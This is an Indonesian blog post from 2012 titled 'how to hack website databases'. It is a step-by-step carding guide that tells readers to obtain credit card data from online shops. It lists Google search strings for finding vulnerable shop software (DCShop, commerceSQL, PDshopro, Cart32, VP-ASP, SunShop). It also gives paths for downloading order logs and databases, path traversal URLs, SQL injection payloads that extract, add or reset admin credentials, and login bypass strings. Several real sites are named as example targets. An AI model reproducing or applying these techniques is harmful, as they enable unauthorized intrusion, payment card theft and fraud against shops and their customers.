Animasi n Sahring

Ads 468x60px

Giusto odio dignissimos

Giusto odio dignissimos

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Omnis dolor repellendus

Omnis dolor repellendus

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Olimpedit quo minus

Olimpedit quo minus

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Itaque earum rerum

Itaque earum rerum

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Epudiandae sint molestiae

Epudiandae sint molestiae

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Sahut aut reiciendis

Sahut aut reiciendis

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More

Jumat, 06 April 2012

CARA HACK DATABASE SITUS

bring me the hack
Cara Dapet CC (credit card)


DCShop

Mendowload file log order DCShop pada folder orders!
1. Cari target dahulu Website DCShop di google.com, dengan keyword allinurl:/DCShop/
2. DCShop akan menyimpan file log ccnya di /DCShop/orders/orders.txt atau
/DCShop/Orders/orders.txt
3. Nah.. utk melihat file log ccnya, ada di : http://www.contoh.com/.../DCShop/orders/orders.txt


commerceSQL

1. Cari target dahulu Website commerceSQL di google.com, dengan keyword allinurl:/commercesql/
2. Misalkan kita mendapat target dg url http://www.contoh.com/commercesql/blablabla , maka :
3. Ganti url tsb menjadi -> www.contoh.com/cgi-bin/commercesql/index.cgi?page=
4. Contoh untuk melihat admin config -> www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
5. Contoh untuk melihat admin manager -> http://www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
6. Sedangkan utk melihat file log/ccnya -> http://www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log


PDshopro

1. Cari target dahulu Website PDshopro di google.com, dengan keyword allinurl:/shop/category.asp/catid=
2. Kita lihat dulu konfirgurasi databasenya dg mengganti urlnya menjadi : www.contoh.com/admin/dbsetup.asp
3. Contoh target : http://www.marktwainbooks.com/admin/dbsetup.asp
4. Kita akan mendapatkan output kira² dg keterangan sbb:
5. Nah, dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
6. Sekarang, untuk mendownload file sdatapdshoppro.mdb dapat dilakukan dg merubah urlnya menjadi:
7. http://www.marktwainbooks.com/data/pdshoppro.mdb
8. Untuk membuka file .mdb-nya dengan menggunakan program Microsoft Access
9. Try this one!!


EShop

Mendowload file log order EShop pada folder database!
1. Cari target dahulu Website EShop di google.com, dengan keyword allinurl:/eshop/
2. DCShop akan menyimpan file log ccnya di /cg-bin/eshop/database/order.mdb
3. Nah.. utk melihat file log ccnya, ada di : http://www.contoh.com/.../cg-bin/eshop/database/order.mdb
4. Selamat Mencoba


Cart32 v3.5a

1. Cari target dahulu Website Cart32 min v3.5a di google.com, dengan keyword allinurl:/cart32.exe/
2. Ambil salah satu site hasil pencarian, misalnya : http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
3. Ganti url tsb diakhir stringnya menjadi http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/error <-- setelah string /cart32.exe/ ditambah kata error 4. Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses! 5. Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory 6. Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc's! 7. Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.... 8. Ganti string url tsb. menjadi seperti ini : http://www.wideopen.net/wrburns_s/cgi-bin/cart32/ <-- dimana string .exe dihapus/dihilangkan! 9. Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format http://www.contoh.com/cart32/ 10. Contoh http://www.wideopen.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32 Ok, semoga berhasil!!!! VP-ASP Shopping Cart 5.0 Cara II SQL Injection vulnerability pada script 'shopdisplayproducts.asp' 1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopdisplayproducts.asp 2. Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp http://.../vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'-- 3. Ganti²lah nilai dari string url terakhir dg: %20'a%25'-- %20'b%25'-- %20'c%25'-- dst... 4. Naah.. kalau berhasil, kita akan mendapatkan informasi username dan password admin! 5. Untuk login admin ke http://.../vpasp/shopadmin.asp VP-ASP Shopping Cart 5.0 SQL Injection vulnerability pada script 'shopsearch.asp' 1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopsearch.asp 2. Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine : Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6 Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 jangan lupa untuk mengganti dan sesuai selera!: 3. Untuk mengganti password admin, masukkan keyword berikut : Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6 4. Untuk login admin, ada di http://.../vpasp/shopadmin.asp 5. Semoga berhasil!! Meta Cart Details Exploit : Access langsung pada target url dimana letak file database pada web tertentu yang di install metacart system. RUMUS : http://targetshop/database/metacart.mdb http://Targetshop/metacart/database/metacart.mdb Keywords di google: cart,METACART Sales Cart 1.Buka Google.Com dan gunakan keyword Lobby.asp 2.Bila menemukan site www.asu.com/mall/lobby.asp ganti dng www.asu.com/fpdb/shop.mdb Selamat mencoba....!! BUG pada shopdbtest.asp 1.Buka google"Kenapa google ? Karena Google adalah Search engine temannya para hacker and cracker 2.Keyword "shopadmin.asp" tanpa tanda kutip 3.Cari yang Ujungnya shopadmin .asp contoh:http://www.youngsliquors.com/winestore/shopadmin.asp 4.Masukkan Rumus ini "Http://www.[Nama domain]/dir/shopdbtest.asp contoh:http://www.youngsliquors.com/winestore/shopdbtest.asp 5.Trus lihat apa nama databasenya and letaknya pada:xDatabase and xDblocation contoh : xDatabase : shopping300 xDatabase :../../../../www/youngsliquors/5498761211 6.Trus kita masukin rumusnya Http://www.[Nama domain]/dir/ *.mdb > contoh : http://www.youngsliquors.com/winestore/shopping300.mdb
Trus baca deh .mdb-nya pakai Ms.acces
selamat mencoba.

1. Buka browsing/url www.google.co.id

2. Kemudian ketik => shopadmin.asp

3. Kalau sudah dapat target nya misalnya salah satu alamat site nya yg ada di google :
contoh : http://www.partsupply.in.th/shopadmin.asp

4. Langkah selanjutnya kamu gunakan teknik SQL Injection
user : 'or'1
pass : 'or'1

5. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh....... CC yg kita inginkan. Kalo kamu mendapatkan nomor credit card (CC) artinya kamu bernasib baik. Tapi kalo belum ada nomor credit card (CC) disana, artinya kamu belum beruntung. Coba cari lagi target lain.

SunShop 3.2

1. keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action="
2. contoh http://www.dohertysgym.com/sunshop/index.php
3. ganti kata index.php dengan admin jadi :
4. http://www.dohertysgym.com/sunshop/admin
5. login pake user: admin pass: 'or''='

//------- Penutup --------

2 komentar:

  1. sama semua tp ngak da yang beres gan!!!!!!!!!!!

    BalasHapus
  2. rumit juga yah gan, oke lah aku ijin mencoba nya gan..
    baca selengkapnya

    BalasHapus

Widgeo